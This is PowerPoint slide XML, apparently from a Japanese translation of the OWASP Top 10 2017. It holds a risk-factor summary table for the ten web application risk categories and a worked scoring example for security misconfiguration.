                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に対して負うかを決定してください。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>の目的は、特定のアプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>を想定したリスク分析ではありません。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>以下に、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>A6:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>不適切なセキュリティ設定</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>を例として、我々の計算を示します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="5638800"/>
          <a:ext cx="6629400" cy="2786400"/>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69600">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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b="1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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525600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="10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アプリケーションによる</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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悪用のしやすさ</a:t>
                      </a:r>
                      <a:endPar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p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ja-JP" alt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1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ja-JP" alt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rPr>
                        <a:t>蔓延度</a:t>
                      </a:r>
                      <a:endParaRPr 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p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="10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10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1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ja-JP" alt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検出のしやすさ</a:t>
                      </a:r>
                      <a:endParaRPr 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p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="ja-JP" alt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1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ja-JP" alt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技術面</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ja-JP" alt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中程度</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1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2</a:t>
                      </a:r>
                      <a:endPar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ja-JP" altLang="en-US" sz="10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10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591200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2600" b="1" i="0" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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600" b="1" i="0" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>3</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i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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900"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" b="1" i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>平均</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>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b="1" i="0" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>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i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>= 3.0</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i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="22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i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>*</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rgbClr val="000000"/>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i="0" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>2</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744036" y="7975385"/>
            <a:ext cx="1305144" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Meiryo" charset="-128"/>
              <a:ea typeface="Meiryo" charset="-128"/>
              <a:cs typeface="Meiryo" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>リスクに関する注記</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="60374" y="5744283"/>
            <a:ext cx="5966051" cy="385324"/>
            <a:chOff x="-98651" y="1070390"/>
            <a:chExt cx="5966051"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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Meiryo" charset="-128"/>
                  <a:ea typeface="Meiryo" charset="-128"/>
                  <a:cs typeface="Meiryo" charset="-128"/>
                </a:rPr>
                <a:t>影響</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:endParaRP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98651" y="1108760"/>
              <a:ext cx="723275" cy="298440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" alt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脅威</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP"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a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" alt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エージェント</a:t>
              </a:r>
              <a:endParaRPr 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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Meiryo" charset="-128"/>
                  <a:ea typeface="Meiryo" charset="-128"/>
                  <a:cs typeface="Meiryo" charset="-128"/>
                </a:rPr>
                <a:t>攻撃手法</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p: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26280" y="6257574"/>
            <a:ext cx="316911"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3" name="Rectangle 116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3034586" y="5746150"/>
            <a:ext cx="1020368" cy="381589"/>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r" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ja-JP" alt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セキュリティ上の</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ja-JP" alt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24" name="AutoShape 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3034589" y="5746150"/>
            <a:ext cx="220306" cy="381589"/>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700" b="1" dirty="0">
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4205337" y="7053145"/>
            <a:ext cx="292533"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="AutoShape 140"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4058870" y="5936945"/>
            <a:ext cx="1357955"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Tree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183629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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76DAED4-C626-9041-A35A-0F1DB33E7F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399831308"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2393950"/>
          <a:ext cx="6842248" cy="4575325"/>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69958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="16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リスク</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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b="1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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10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Score</a:t>
                      </a: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A1:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                      </a:b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インジェクション</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00" b="1" i="0" dirty="0">
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8.0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A2:2017-</a:t>
                      </a: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認証の不備</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altLang="ja-JP"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7.0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93205">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A3:2017-</a:t>
                      </a:r>
                      <a:b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b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機微情報の露出</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12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altLang="ja-JP"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7.0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93205">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <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A4:2017-XML</a:t>
                      </a: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外部エンティティ参照</a:t>
                      </a:r>
                      <a:r>
                        <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(XXE)</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7.0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A5:2017-</a:t>
                      </a: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アクセス制御の不備</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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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dirty="0">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i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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366522">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A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" i="0" kern="120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不適切なセキュリティ処理</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12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中程度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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A7:2017-</a:t>
                      </a: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クロスサイトスクリプティング</a:t>
                      </a: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 (XSS)</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12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中程度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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93205">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <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A8:2017-</a:t>
                      </a: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安全でないでシリアライゼーション</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困難</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1</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ja-JP" alt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i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5.0</a:t>
                      </a:r>
                      <a:endPar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A9:2017-</a:t>
                      </a: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脆弱性のあるコンポーネントの使用</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12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中程度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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4.7</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A10:2017-</a:t>
                      </a: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不十分なロギングとモニタリング</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ja-JP" altLang="en-US" sz="8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12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困難</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1</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中程度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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ja-JP" altLang="en-US" sz="8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4.0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34" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3477934690"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="838200"/>
          <a:ext cx="6858000" cy="152047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55442">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>リスクファクターのまとめ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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165028">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ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>下の表は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017 Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションのセキュリティリスクと各リスクに紐付けたリスクファクターのまとめです。これらのファクターは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>チームが持つ統計資料と経験に基づき決定しました。それぞれのアプリケーションや組織におけるリスクを理解するために、「脅威エージェント」と「ビジネス面への影響」を考慮しないといけません。ソフトウェアに甚大な弱点があったとしても、攻撃をする「脅威エージェント」がいない、或いは関連資産への「ビジネス面への影響」が極めて少ない場合、重大なリスクにはなりません。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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5" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="7048812"/>
          <a:ext cx="6858000" cy="2853376"/>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ja-JP" altLang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>その他の考慮すべきリスク</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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515936">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altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
